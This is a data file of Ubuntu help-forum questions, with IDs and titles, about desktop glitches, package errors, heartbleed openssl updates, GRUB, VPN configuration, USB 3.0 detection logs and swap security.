444836	ubuntu ( vm ) showing two different workspace when connected to external screen	i 'm new to ubuntu and have a very strange issue . i 'm running ubuntu as a hyper v machine from windows 8.1 and connecting through xrdp . when i 'm at work , i use an external monitor . when i rdp to the machine without the external screen connected i get a different workspace . another example : if i have chrome open in the non-external-monitor workspace , then when i 'm connected to the monitor i ca n't open chrome ( well , it opens , but not in the workspace i 'm seeing ) the thing is , i ca n't find that other workspace anywhere ! please , this is so weird ! ! appreciate any wisdom on this strange case ...
444837	data lost while transfering	i have windows and ubuntu partitioned systems when i cut 5gb data from ubuntu download folder and pasted in local disk folder in ubuntu , only 1gb data was there and 4gb data lost so how can i retrieve my lost data ? please tell me
444839	ubuntu showing old gui	i was trying to install draftsight and it was showing some error . so to solve that error i installed the following two packages using this command sudo apt-get install ia32-libs libglib2.0-dev after this my panel started showing old kind ui . you can compare between two images . before and after so i removed the above packages immediately ( replaced install with remove in the above command ) and rebooted . after rebooting the there were no panel and titlebars to windows . so i reinstalled compiz using the below command sudo apt-get -- reinstall install compiz and rebooted . the title bar and panel appeared after that . but still it was showing the old gui . i tried removing libglib2.0-0 : i386 package as i saw two versions of libglib package but still not effect . please help i am using elementary os ( 12.04 ) 64bit thanks
444840	how to go to a directory in gnome terminal which contains spaces as its name ?	i tried to md5sum a image but the path is long and contains spaces , and there is no option in the file manager to open that path in gnome-terminal . like right-click- > open current directory in terminal like it used to be in other or previous ubuntu . how can i open a directory in terminal which has long path contains spaces and in ubuntu ?
444842	nec laptop fan always running	i just installed ubuntu 12.04 on my netbook ( dual boot with win xp ) . it is mostly running fine , however , i have one problem . the fan seems to be constantly running at high speed , even if i am not running any programs . the fan was fine on windows xp . any solutions ? : - ) btw , here are my laptop specifications : nec versa n1100 , intel atom n270 1.6ghz , intel gma945 graphics , toshiba 160gb hdd , 1gb edit : it fixed itself already : - )
444843	are pre-releases not getting security updates ?	i got a new computer a couple of weeks before the expected trusty release date , so to save my the trouble of first installing precise and then upgrading , i installed trusty final beta . now i see that even though older releases got a new openssl version last night to address the heartbleed bug , there 's no openssl update for trusty . what 's the deal with that ? are n't pre-releases getting critical security fixes ? who is supposed to want to test a system when testing means not getting critical security fixes ?
444845	what happens after the core selects mass-storage	when a usb mass-storage device is attached to the host , enumeration of the device happens and the process where an address is given to the device , getting the descriptors occurs , then the core checks for the class driver required and assigns the mass-storage driver . what happens after that ? where does the scsi comes in picture ? check the following dmesg output : [ 23870.089465 ] usb 3-2 : new high-speed usb device number 5 using xhci_hcd [ 23870.158769 ] usb 3-2 : new usb device found , idvendor=058f , idproduct=6387 [ 23870.158778 ] usb 3-2 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 23870.158782 ] usb 3-2 : product : mass storage [ 23870.158785 ] usb 3-2 : manufacturer : generic [ 23870.158788 ] usb 3-2 : serialnumber : eea1ee5b [ 23870.202363 ] usb-storage 3-2:1.0 : usb mass storage device detected [ 23870.202469 ] scsi6 : usb-storage 3-2:1.0
444846	path for fonts ?	i searched already for this question and got a page on here where someone answered with `` go to home/username/.fonts '' or somesuch . i ran into a couple problems : no such folder existed . i discovered there was a `` home '' above `` home '' in the hierarchy . went there , double-clicked on my username , it took me back to home . which still did not contain any folder with the word `` font '' or `` fonts '' in it . there is an `` etc '' immediately followed by `` music . '' nothing before `` calibre library '' and nothing after `` zombie shooter 2 saves '' either . so yeah , there is no home/username/.fonts or home/username/fonts or anything of the sort . so where in the 24 hecks does the os actually keep the fonts folder ? and if anyone tells me home/username/fonts or whatever , i may have to scream . i have ubuntu 12 , i think , if that helps .
444848	why unattended-upgrades does not fix heartbleed bug ?	i 've followed the instruction to install unattended-upgrades to install automatic security updates on my server ( ubuntu server 13.10 ) . https : //help.ubuntu.com/community/automaticsecurityupdates can you help me to understand why this morning i still have the heartbleed bug on my server ? $ openssl version -a openssl 1.0.1e 11 feb 2013 built on : wed jan 8 20:58:47 utc 2014 platform : debian-amd64 other information : $ cat /etc/apt/apt.conf.d/20auto-upgrades apt : :periodic : :update-package-lists `` 1 '' ; apt : :periodic : :unattended-upgrade `` 1 '' ; $ cat /var/log/apt/history.log ... . start-date : 2014-04-03 15:33:59 commandline : apt-get install nginx install : libxau6 : amd64 ( 1.0.8-1 , automatic ) , libx11-data : amd64 ( 1.6.1-1ubuntu1 , automatic ) , libxcb1 : amd64 ( 1.9.1-3ubuntu1 , automatic ) , libvpx1 : amd64 ( 1.2.0-2 , automatic ) , libgd3 : amd64 ( 2.1.0-2 , automatic ) , libxdmcp6 : amd64 ( 1.1.1-1 , automatic ) , libxslt1.1 : amd64 ( 1.1.28-2 , automatic ) , nginx-common : amd64 ( 1.4.1-3ubuntu1.3 , automatic ) , nginx : amd64 ( 1.4.1-3ubuntu1.3 ) , nginx-full : amd64 ( 1.4.1-3ubuntu1.3 , automatic ) , libx11-6 : amd64 ( 1.6.1-1ubuntu1 , automatic ) , libxpm4 : amd64 ( 3.5.10-1 , automatic ) end-date : 2014-04-03 15:34:02 start-date : 2014-04-04 10:26:38 commandline : apt-get install unattended-upgrades install : unattended-upgrades : amd64 ( 0.79.3ubuntu8 ) end-date : 2014-04-04 10:26:40 thank you
444849	how to list all virtual machines created using qemu-system-x86_64 ?	i am using qemu-system-x86_64 to boot virtual machines on kvm running on ubuntu 12.04 64-bit desktop . i have a few vm 's that are currently running . i want to get the list of all vm 's booted using qemu-system-x86_64 on this host machine , how do i get this list ? specifications : qemu-system-x86_64 version 1.0 linux 3.2.0-60-generic p.s . : just as a side note , i am aware of virsh -c qemu : ///system list which would list all vms booted using virsh . however , this does not seem to give the list of vms booted using qemu-system-x86_64 , it would be great if virsh command could list the vms booted using qemu-system-x86_64 .
444855	is it possible to verify grub installation without rebooting ?	i 've been bitten by this so many times , and today after the openssl updates in my server grub complained that i should install it again since the `` hard disks that it was previously installed do not exist '' . i have a raid 1 installation with the following setup ( according to bootinfoscript ) : > ============================= boot info summary : =============================== > > = > grub2 ( v1.99 ) is installed in the mbr of /dev/sda and looks at > sector 1 of the same hard drive for core.img . core.img is at this location and looks > for ( mduuid/d2a04f98760e2b3cc23ba87845667605 ) /grub on this drive . > > = > grub2 ( v1.99 ) is installed in the mbr of /dev/sdb and looks at sector 1 of > the same hard drive for core.img . core.img is at this location and looks > for ( mduuid/d2a04f98760e2b3cc23ba87845667605 ) /grub on this drive . my mount points are : > /dev/md2 on / type ext4 ( rw ) > /dev/md1 on /boot type ext3 ( rw ) and mduuid seems to match the ones bootinfoscript mentions : > ls -l /dev/disk/by-id/md-uuid-* > > lrwxrwxrwx 1 root root 9 mar 19 11:37 /dev/disk/by-id/md-uuid-38048286 : e3004e47:510ca3e1:2bae3f2e - > ../../md2 > > lrwxrwxrwx 1 root root 9 mar 19 11:37 /dev/disk/by-id/md-uuid-d2a04f98:760e2b3c : c23ba878:45667605 - > ../../md1 > > lrwxrwxrwx 1 root root 9 mar 19 11:37 /dev/disk/by-id/md-uuid-e099b695:0143bb58 : e4ef7645:0f22ce0b - > ../../md0 running grub-install works , but i want to make sure that after rebooting grub will actually correctly boot up my partitions . how can i verify it ?
444858	dpkg error : `` could not exec dpkg ! e : sub-process /usr/bin/dpkg returned an error code ( 100 ) ``	i am using ubuntu 13.10 , and i have deleted the dpkg directory . i removed /var/lib/dpkg , after the system gave me an error like : could not open lock file /var/lib/dpkg/lock when i was installing ubuntu-restricted-extras . could anyone help me ?
444863	configuring python development version installation	while installing psi4 on edit : ubuntu 13.10 ( earlier ubuntu 12.04 ) , i 'm encountering the following error : configure : error : could not link test program to python . maybe the main python library has been installed in some non-standard library path . if so , pass it to configure , via the ldflags environment variable . example : ./configure ldflags= '' -l/usr/non-standard-path/python/lib '' ============================================================================ error ! you probably have to install the development version of the python package for your distribution . the exact name of this package varies among them installation line : ../configure -- prefix=/usr/local/psi4 -- with-blas='-mkl ' -- with-incdirs=-mkl possible duplicates : where is python library installed ? similar problems : python error while configuring mesos on centos error compiling a c++ with python bindings using mingw and msys another possible solution on ubuntu forums . what i 've tried : i 've install python-dev and python2.7-dev using apt-get . this is the solution mentioned in the first , second and fourth links . i still keep getting the same error . what i do n't understand : is the problem coming because of the 32-bit compiler and 64-bit python mismatch mentioned in the third link ( error compiling ... mingw ... ) ? if the answer to 1 is yes , how do i make the compiler use 32-bit python ? p.s . maybe this is irrelevant , but the log ( before the error ) pertaining to python checking for a python interpreter with version > = 2.6 ... python checking for python ... /usr/bin/python checking for python version ... 2.7 checking for python include statements ... -i/usr/include/python2.7 -i/usr/include/python2.7 checking for python linker flags ... -l/usr/lib/python2.7/config -lpthread -ldl -lutil -lm -lpython2.7 -xlinker -export-dynamic -wl , -o1 -wl , -bsymbolic-functions checking consistency of all components of python development environment ... no configure : error :
444866	how to save vpn passwords with networkmanger for nmcli ?	there are many posts about putting vpn passwords into /etc/networkmanager/system-connections/ < connection > . i ca n't get any of them working on ubuntu 12.04 . the fields in the questions and answers seem subtly different from mine . the one that came closest seemed to be : how to save vpn passwords with networkmanger . i 'd prefer to have nmcli ask for passwords on the console instead of in a gui widget on the desktop , but that seems impossible . so two questions : are the /etc/networkmanager/system-connections/ < connection > files and their fields officially documented anywhere ? there seem to be many 404s for networkmanager documentation links . what is wrong with my connection file ? here is my conneciton file . i 've tried many variations of settings in this file , but this is as close to good as i could come up with ( anonymized of course ) : [ connection ] # not sure if this helps or breaks anything . fails regardless . permissions=user : peter : ; id=my vpnc uuid=a2cd97d5-7df1-4391-91d8-7e72931ec2de type=vpn autoconnect=false timestamp=1396942441 [ vpn ] service-type=org.freedesktop.networkmanager.vpnc nat traversal mode=natt ipsec-secret-type=save ipsec secret-flags=0 xauth-password-type=save vendor=cisco xauth username=user ipsec gateway=1.2.3.4 xauth password-flags=0 ipsec id=ipsec perfect forward secrecy=server ike dh group=dh2 [ vpn-secrets ] xauth password=password ipsec secret=grouppassword [ ipv4 ] method=auto permissons : > ls -l /etc/networkmanager/system-connections/my\ vpnc -rw -- -- -- - 1 root root 527 apr 8 10:11 /etc/networkmanager/system-connections/my vpnc running it gives : > sudo nmcli con up id 'my vpnc' active connection state : unknown active connection path : /org/freedesktop/networkmanager/activeconnection/44 state : vpn connecting ( need authentication ) ( 2 ) error : connection activation failed : no valid vpn secrets . edit : here is another similar post ( about openconnect vpn though ) : how can i get networkmanager to autoconnect to a openconnect vpn via nmcli without prompting for a user and password
444869	how to enter password on console with networkmanager 's nmcli	i want to connect to a vpn with nmcli . is there a way to allow me to provide a password to nmcli from the console ? there seem to be ways to store the password in /etc/networkmanager/system-connections/ < connection > , that i do n't seem to be able to get working . but i 'd prefer not storing passwords in files at all . on the desktop i enter the password every time , but when i run sudo nmcli con up id myvpn over ssh , it opens a gui dialog on the remote desktop asking for my password , which seems like a strange design decision to me . if i had e.g . vnc to the remote desktop , i would n't use nmcli ...
444870	difference between shutdown -r and shutdown -p ?	what 's the difference between shutdown -r and shutdown -p ?
444871	can i install ubuntu on a mac ? ( no dual boot just ubuntu )	i have googled for quite a while now and have n't found the answer . my question is , can i install ubuntu on a mac and leaving out the mac os . i just want it to boot ubuntu and nothing else . maybe a strange question but i got that mac book pro ( 2012 ) for cheap and i just can not get into mac os and i 'd rather just have ubuntu on it using the whole disk . i have read of problems with mac booting into grub without refit or similar . is it possible ? regards anni
444873	problem updating openssl in 13.10 - how to diagnose or work around ?	following the instructions in the existing question on the openssl bugs , i 've run apt-get update and upgrade , and rebooted . now when i check the version , i do not have the version mentioned in the answers to the previous question `` 1.0.1-4ubuntu5.12 '' > dpkg -s openssl version : 1.0.1e-3ubuntu1.2 > openssl version openssl 1.0.1e 11 feb 2013
444879	php app in openstack	i have installed openstack using devstack . i have php5 , apache2 and mysql installed too obviously . i want to know that how can i run a simple php page using openstack because all i see tutorials on installing openstack and none on how to deploy a simple app on openstack can anyone guide me to run only a simple webpage using openstack ?
444880	why do i need to run `` /bin/bash -- login ''	i have just setup a new ubuntu 13.10 server with ruby 2.1.1 installed through rvm . the problem is that whenever i switch to the user `` rails '' ( the user i installed ruby and rails with ) i have to run /bin/bash -- login before ubuntu recognises that ruby , rails or rvm is installed . hope someone knows : what does the command above do ? why do i need to run it ? and what can i do to solve it once and for all ? : ) any help is appreciated !
444888	changed graphic driver on macbook , cant boot now	so hello first , a few days i had the great idea to put ubuntu on my macbook ( mid 2010 , non-pro ) , because i needed a couple of programms for studying and the professor suggested using ubuntu . i than installed ubuntu on my macbook and replaced osx competely . at first it seemed to work , but i noticed some graphical glitches . when i first tried to open some applications , it crashed and the screen got all messy with weird colours . i thought it was a graphic driver issue , so i decided to look into that . unfortunately i than found the driver section and thought to myself . let´s try them out : what could possibly go wrong ? well everything . now my laptop won´t start . it just goes into a black screen . i tried to do something via grub , but i´am quite inexperienced with ubuntu , so i could not accomplish anything . i also tried to boot from the usb stick again , but failed to do so . i installed ubuntu 13.10 . i really need help , because i need this laptop next week . thanks for any advice !
444890	choice of operating system	i have successfully loaded ubuntu alongside windows xp but when i start up my computer there is no choice to boot into windows , why not ?
444894	can not run php after upgrading from apache 2.2 to apache 2.4	im trying to upgrade apache from 2.2.22 to apache 2.4.x on ubuntu 12.04 . i have php5.3.10 running on my server for the application . when i install the new version of apache 2.4 it uninstall the apache2-common and libapache2-mod-php5 and unable to run my applications . i have tried to upgrade php to 5.4 and tried to upgrade apache . followed few links , but did n't solve my issue . https : //launchpad.net/~ondrej/+archive/apache2 ? field.series_filter=precise apt-add-repository ppa : ptn107/apache how to install the php library modules ( libapache2-mod-php5 ) for apache2.4 . thanks , sivaprakash r
444895	first restart purple screen	hi i 'm new to ubuntu and i just installed it onto my sony viao and after my first restart it just stayed on a purple screen . i have n't done much with it and i hope you guys can help me .
444897	usb 3.0 not recognized by usb 3.0 port	i 'm various days having a problem with the usb 3.0 port an a usb pen 3.0 . the port 3.0 does n't recognize the 3.0 flash usb but the 2.0 yes . this is not a problem of the flash usb , because i have tested it in another pc and it works fine . it also works in the usb 2.0 port . i have tested too with various kernels , but this does n't fix the problem . there are some outputs : dmesg | grep usb : [ 0.281707 ] usbcore : registered new interface driver usbfs [ 0.281712 ] usbcore : registered new interface driver hub [ 0.281724 ] usbcore : registered new device driver usb [ 0.661539 ] usb usb1 : new usb device found , idvendor=1d6b , idproduct=0002 [ 0.661541 ] usb usb1 : new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 0.661542 ] usb usb1 : product : ehci host controller [ 0.661543 ] usb usb1 : manufacturer : linux 3.13.0-23-generic ehci_hcd [ 0.661544 ] usb usb1 : serialnumber : 0000:00:1a.0 [ 0.677537 ] usb usb2 : new usb device found , idvendor=1d6b , idproduct=0002 [ 0.677538 ] usb usb2 : new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 0.677539 ] usb usb2 : product : ehci host controller [ 0.677540 ] usb usb2 : manufacturer : linux 3.13.0-23-generic ehci_hcd [ 0.677541 ] usb usb2 : serialnumber : 0000:00:1d.0 [ 0.677972 ] usb usb3 : new usb device found , idvendor=1d6b , idproduct=0002 [ 0.677973 ] usb usb3 : new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 0.677974 ] usb usb3 : product : xhci host controller [ 0.677975 ] usb usb3 : manufacturer : linux 3.13.0-23-generic xhci_hcd [ 0.677976 ] usb usb3 : serialnumber : 0000:00:14.0 [ 0.680584 ] usb usb4 : new usb device found , idvendor=1d6b , idproduct=0003 [ 0.680585 ] usb usb4 : new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 0.680586 ] usb usb4 : product : xhci host controller [ 0.680587 ] usb usb4 : manufacturer : linux 3.13.0-23-generic xhci_hcd [ 0.680587 ] usb usb4 : serialnumber : 0000:00:14.0 [ 0.989759 ] usb 1-1 : new high-speed usb device number 2 using ehci-pci [ 1.122197 ] usb 1-1 : new usb device found , idvendor=8087 , idproduct=8008 [ 1.122199 ] usb 1-1 : new usb device strings : mfr=0 , product=0 , serialnumber=0 [ 1.234000 ] usb 2-1 : new high-speed usb device number 2 using ehci-pci [ 1.366447 ] usb 2-1 : new usb device found , idvendor=8087 , idproduct=8000 [ 1.366448 ] usb 2-1 : new usb device strings : mfr=0 , product=0 , serialnumber=0 [ 1.534196 ] usb 3-7 : new full-speed usb device number 2 using xhci_hcd [ 1.551198 ] usb 3-7 : new usb device found , idvendor=13d3 , idproduct=3394 [ 1.551199 ] usb 3-7 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 1.551200 ] usb 3-7 : product : rt bluetooth radio [ 1.551201 ] usb 3-7 : manufacturer : realtek [ 1.551202 ] usb 3-7 : serialnumber : 00e04c000001 [ 5.193698 ] usbcore : registered new interface driver btusb [ 41.223409 ] usb 4-2 : new superspeed usb device number 2 using xhci_hcd [ 41.256748 ] usb 4-2 : new usb device found , idvendor=0951 , idproduct=1666 [ 41.256752 ] usb 4-2 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 41.256754 ] usb 4-2 : product : datatraveler 3.0 [ 41.256755 ] usb 4-2 : manufacturer : kingston [ 41.256757 ] usb 4-2 : serialnumber : 60a44c3fac2dfe11898a02ca [ 46.256368 ] usb 4-2 : set sel for device-initiated u2 failed . [ 46.256517 ] usb 4-2 : usb disconnect , device number 2 [ 46.270019 ] usbcore : registered new interface driver usb-storage [ 46.729073 ] usb 4-2 : new superspeed usb device number 3 using xhci_hcd [ 46.762440 ] usb 4-2 : new usb device found , idvendor=0951 , idproduct=1666 [ 46.762444 ] usb 4-2 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 46.762446 ] usb 4-2 : product : datatraveler 3.0 [ 46.762447 ] usb 4-2 : manufacturer : kingston [ 46.762448 ] usb 4-2 : serialnumber : 60a44c3fac2dfe11898a02ca [ ... ] [ 289.841490 ] usb 4-2 : disable of device-initiated u1 failed . [ 289.845126 ] usb 4-2 : disable of device-initiated u2 failed . [ 289.845140 ] usb-storage 4-2:1.0 : usb mass storage device detected [ 289.845435 ] scsi19 : usb-storage 4-2:1.0 [ 289.849135 ] usb 4-2 : set sel for device-initiated u1 failed . [ 289.852634 ] usb 4-2 : set sel for device-initiated u2 failed . [ 290.962843 ] usb 4-2 : reset superspeed usb device number 17 using xhci_hcd [ 291.114522 ] usb 4-2 : usb disconnect , device number 17 [ 295.990420 ] usb 4-2 : set sel for device-initiated u2 failed . [ 296.451513 ] usb 4-2 : new superspeed usb device number 18 using xhci_hcd [ 296.484765 ] usb 4-2 : new usb device found , idvendor=0951 , idproduct=1666 [ 296.484775 ] usb 4-2 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 296.484780 ] usb 4-2 : product : datatraveler 3.0 [ 296.484785 ] usb 4-2 : manufacturer : kingston [ 296.484789 ] usb 4-2 : serialnumber : 60a44c3fac2dfe11898a02ca [ 301.490828 ] usb 4-2 : set sel for device-initiated u2 failed . [ 306.498823 ] usb 4-2 : disable of device-initiated u1 failed . [ 306.502252 ] usb 4-2 : disable of device-initiated u2 failed . [ 306.502259 ] usb-storage 4-2:1.0 : usb mass storage device detected [ 306.502352 ] scsi20 : usb-storage 4-2:1.0 [ 306.505763 ] usb 4-2 : set sel for device-initiated u1 failed . [ 306.509277 ] usb 4-2 : set sel for device-initiated u2 failed . [ 307.616379 ] usb 4-2 : reset superspeed usb device number 18 using xhci_hcd [ 307.768275 ] usb 4-2 : usb disconnect , device number 18 [ 312.643929 ] usb 4-2 : set sel for device-initiated u2 failed . [ 313.104744 ] usb 4-2 : new superspeed usb device number 19 using xhci_hcd [ 313.138068 ] usb 4-2 : new usb device found , idvendor=0951 , idproduct=1666 [ 313.138072 ] usb 4-2 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 313.138074 ] usb 4-2 : product : datatraveler 3.0 [ 313.138076 ] usb 4-2 : manufacturer : kingston [ 313.138078 ] usb 4-2 : serialnumber : 60a44c3fac2dfe11898a02ca [ 318.140286 ] usb 4-2 : set sel for device-initiated u2 failed . [ 323.144408 ] usb 4-2 : disable of device-initiated u1 failed . [ 323.148003 ] usb 4-2 : disable of device-initiated u2 failed . [ 323.148044 ] usb-storage 4-2:1.0 : usb mass storage device detected [ 323.148296 ] scsi21 : usb-storage 4-2:1.0 [ 323.152030 ] usb 4-2 : set sel for device-initiated u1 failed . [ 323.155530 ] usb 4-2 : set sel for device-initiated u2 failed . [ 324.265951 ] usb 4-2 : reset superspeed usb device number 19 using xhci_hcd [ 324.417611 ] usb 4-2 : usb disconnect , device number 19 [ 329.293212 ] usb 4-2 : set sel for device-initiated u2 failed . [ 329.754169 ] usb 4-2 : new superspeed usb device number 20 using xhci_hcd [ 329.787576 ] usb 4-2 : new usb device found , idvendor=0951 , idproduct=1666 [ 329.787583 ] usb 4-2 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 329.787587 ] usb 4-2 : product : datatraveler 3.0 [ 329.787591 ] usb 4-2 : manufacturer : kingston [ 329.787594 ] usb 4-2 : serialnumber : 60a44c3fac2dfe11898a02ca [ 334.789703 ] usb 4-2 : set sel for device-initiated u2 failed . [ 339.793818 ] usb 4-2 : disable of device-initiated u1 failed . [ 344.797777 ] usb 4-2 : disable of device-initiated u2 failed . [ 344.797791 ] usb-storage 4-2:1.0 : usb mass storage device detected [ 344.797943 ] scsi22 : usb-storage 4-2:1.0 [ 349.801819 ] usb 4-2 : set sel for device-initiated u1 failed . [ 354.805929 ] usb 4-2 : set sel for device-initiated u2 failed . [ 354.806215 ] usb 4-2 : usb disconnect , device number 20 lspci : 00:00.0 host bridge : intel corporation xeon e3-1200 v3/4th gen core processor dram controller ( rev 06 ) subsystem : micro-star international co. , ltd. [ msi ] device 10e9 flags : bus master , fast devsel , latency 0 capabilities : < access denied > 00:01.0 pci bridge : intel corporation xeon e3-1200 v3/4th gen core processor pci express x16 controller ( rev 06 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=01 , subordinate=01 , sec-latency=0 i/o behind bridge : 0000e000-0000efff memory behind bridge : f6000000-f70fffff prefetchable memory behind bridge : 00000000e0000000-00000000f1ffffff capabilities : < access denied > kernel driver in use : pcieport 00:01.1 pci bridge : intel corporation xeon e3-1200 v3/4th gen core processor pci express x8 controller ( rev 06 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=02 , subordinate=02 , sec-latency=0 capabilities : < access denied > kernel driver in use : pcieport 00:02.0 vga compatible controller : intel corporation 4th gen core processor integrated graphics controller ( rev 06 ) ( prog-if 00 [ vga controller ] ) subsystem : micro-star international co. , ltd. [ msi ] device 10e9 flags : bus master , fast devsel , latency 0 , irq 47 memory at f7400000 ( 64-bit , non-prefetchable ) [ size=4m ] memory at d0000000 ( 64-bit , prefetchable ) [ size=256m ] i/o ports at f000 [ size=64 ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel driver in use : i915 00:03.0 audio device : intel corporation xeon e3-1200 v3/4th gen core processor hd audio controller ( rev 06 ) subsystem : micro-star international co. , ltd. [ msi ] device 10e9 flags : bus master , fast devsel , latency 0 , irq 50 memory at f7a14000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel 00:14.0 usb controller : intel corporation 8 series/c220 series chipset family usb xhci ( rev 05 ) ( prog-if 30 [ xhci ] ) subsystem : micro-star international co. , ltd. [ msi ] device 10e9 flags : bus master , medium devsel , latency 0 , irq 45 memory at f7a00000 ( 64-bit , non-prefetchable ) [ size=64k ] capabilities : < access denied > kernel driver in use : xhci_hcd 00:16.0 communication controller : intel corporation 8 series/c220 series chipset family mei controller # 1 ( rev 04 ) subsystem : micro-star international co. , ltd. [ msi ] device 10e9 flags : bus master , fast devsel , latency 0 , irq 49 memory at f7a1e000 ( 64-bit , non-prefetchable ) [ size=16 ] capabilities : < access denied > kernel driver in use : mei_me 00:1a.0 usb controller : intel corporation 8 series/c220 series chipset family usb ehci # 2 ( rev 05 ) ( prog-if 20 [ ehci ] ) subsystem : micro-star international co. , ltd. [ msi ] device 10e9 flags : bus master , medium devsel , latency 0 , irq 16 memory at f7a1c000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : < access denied > kernel driver in use : ehci-pci 00:1b.0 audio device : intel corporation 8 series/c220 series chipset high definition audio controller ( rev 05 ) subsystem : micro-star international co. , ltd. [ msi ] device 10e9 flags : bus master , fast devsel , latency 0 , irq 51 memory at f7a10000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel 00:1c.0 pci bridge : intel corporation 8 series/c220 series chipset family pci express root port # 1 ( rev d5 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=03 , subordinate=03 , sec-latency=0 i/o behind bridge : 00002000-00002fff memory behind bridge : cf200000-cf3fffff prefetchable memory behind bridge : 00000000cf400000-00000000cf5fffff capabilities : < access denied > kernel driver in use : pcieport 00:1c.3 pci bridge : intel corporation 8 series/c220 series chipset family pci express root port # 4 ( rev d5 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=04 , subordinate=04 , sec-latency=0 i/o behind bridge : 0000d000-0000dfff memory behind bridge : f7900000-f79fffff capabilities : < access denied > kernel driver in use : pcieport 00:1c.5 pci bridge : intel corporation 8 series/c220 series chipset family pci express root port # 6 ( rev d5 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=05 , subordinate=05 , sec-latency=0 i/o behind bridge : 0000c000-0000cfff memory behind bridge : f7800000-f78fffff capabilities : < access denied > kernel driver in use : pcieport 00:1d.0 usb controller : intel corporation 8 series/c220 series chipset family usb ehci # 1 ( rev 05 ) ( prog-if 20 [ ehci ] ) subsystem : micro-star international co. , ltd. [ msi ] device 10e9 flags : bus master , medium devsel , latency 0 , irq 23 memory at f7a1b000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : < access denied > kernel driver in use : ehci-pci 00:1f.0 isa bridge : intel corporation hm86 express lpc controller ( rev 05 ) subsystem : micro-star international co. , ltd. [ msi ] device 10e9 flags : bus master , medium devsel , latency 0 capabilities : < access denied > kernel driver in use : lpc_ich 00:1f.2 sata controller : intel corporation 8 series/c220 series chipset family 6-port sata controller 1 [ ahci mode ] ( rev 05 ) ( prog-if 01 [ ahci 1.0 ] ) subsystem : micro-star international co. , ltd. [ msi ] device 10e9 flags : bus master , 66mhz , medium devsel , latency 0 , irq 46 i/o ports at f0b0 [ size=8 ] i/o ports at f0a0 [ size=4 ] i/o ports at f090 [ size=8 ] i/o ports at f080 [ size=4 ] i/o ports at f060 [ size=32 ] memory at f7a1a000 ( 32-bit , non-prefetchable ) [ size=2k ] capabilities : < access denied > kernel driver in use : ahci 00:1f.3 smbus : intel corporation 8 series/c220 series chipset family smbus controller ( rev 05 ) subsystem : micro-star international co. , ltd. [ msi ] device 10e9 flags : medium devsel , irq 255 memory at f7a19000 ( 64-bit , non-prefetchable ) [ size=256 ] i/o ports at f040 [ size=32 ] 01:00.0 3d controller : nvidia corporation gk208m [ geforce gt 740m ] ( rev a1 ) subsystem : micro-star international co. , ltd. [ msi ] device 10e9 flags : bus master , fast devsel , latency 0 , irq 48 memory at f6000000 ( 32-bit , non-prefetchable ) [ size=16m ] memory at e0000000 ( 64-bit , prefetchable ) [ size=256m ] memory at f0000000 ( 64-bit , prefetchable ) [ size=32m ] i/o ports at e000 [ size=128 ] expansion rom at f7000000 [ disabled ] [ size=512k ] capabilities : < access denied > kernel driver in use : nouveau 04:00.0 ethernet controller : qualcomm atheros ar8161 gigabit ethernet ( rev 10 ) subsystem : micro-star international co. , ltd. [ msi ] device 10e9 flags : bus master , fast devsel , latency 0 , irq 52 memory at f7900000 ( 64-bit , non-prefetchable ) [ size=256k ] i/o ports at d000 [ size=128 ] capabilities : < access denied > kernel driver in use : alx 05:00.0 network controller : realtek semiconductor co. , ltd. rtl8723ae pcie wireless network adapter subsystem : azurewave device 2114 flags : bus master , fast devsel , latency 0 , irq 17 i/o ports at c000 [ size=256 ] memory at f7800000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : rtl8723ae fdisk -l : http : //paste.ubuntu.com/7220761/ lsusb ( i have seen that the device number of the stick is changing always , like it was in a loop connecting and disconnecting ) : bus 002 device 002 : id 8087:8000 intel corp . bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 8087:8008 intel corp . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 015 : id 0951:1666 kingston technology bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 002 : id 13d3:3394 imc networks bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub lsusb -v -s 004:022 : http : //paste.ubuntu.com/7220804/ i hope you can help me , thank you . regards
444899	how could one really get sensitive information from a swap partition ?	when i google this question , i only get all sort of information on how to protect sensitive data , how to encrypt swap , and how `` dangerous '' could be to keep a `` normal '' swap in a linux system . but i could n't find any software , method or `` how to '' in order to really get ( read ) any piece of data from a swap partition . so my question is , being a `` normal '' citizen living in western europe , is it really necessary to wipe or encrypt the swap on my computer ? and before someone answer `` yes '' , can i have an exemple on how i could test , and leak out my own swap , so that i can actually see what kind of data is unprotected despite my encrypted home ?
444900	virtualbox ubuntu 12.04 lts guest can not shutdown	i have a virtualbox guest running ubuntu 12.04 lts . the host is also an ubuntu 12.04 lts . virtualbox running is version 4.3.10 when i 'm running in the guest and click on the shutdown button , nothing happens at all . i can shutdown the guest by doing a shutdown now . basically trying to send an acpi shutdown to the guest does not work at all for some reason . does anyone know how i can figure out what is going on ? i looking in the virtualbox logs for my machine but nothing seems to be written there that could provide some information .
